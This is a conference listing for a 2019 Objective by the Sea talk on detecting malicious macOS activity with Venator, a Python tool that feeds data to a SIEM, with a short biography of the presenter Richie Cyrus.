Detecting macOS Compromise with Venator

Presented at Objective by the Sea version 2.0 (2019), June 1, 2019, 2:55 p.m. (30 minutes).

Various solutions exist to detect malicious activity on macOS. However, they are not intended for enterprise use or involve installation of an agent. This session will introduce and demonstrate how to detect malicious macOS activity using the tool Venator. Venator is a python based macOS tool designed to provide defenders with the data to proactively identify malicious macOS activity at scale. This data can then be imported into a SIEM for the purpose of building robust analytics during hunting engagements.


Presenters:

  • Richie Cyrus - Senior Consultant at SpecterOps
    Richie Cyrus is a Senior Consultant at SpecterOps, with experience in incident response, digital forensics, network forensics, and security operations within the Fortune 500 & Federal Government. He specializes in detection of advanced adversaries with a focus in MacOS and Linux environments. Richie currently maintains a DFIR focused blog at https://medium.com/securityneversleeps.

Links:

Similar Presentations: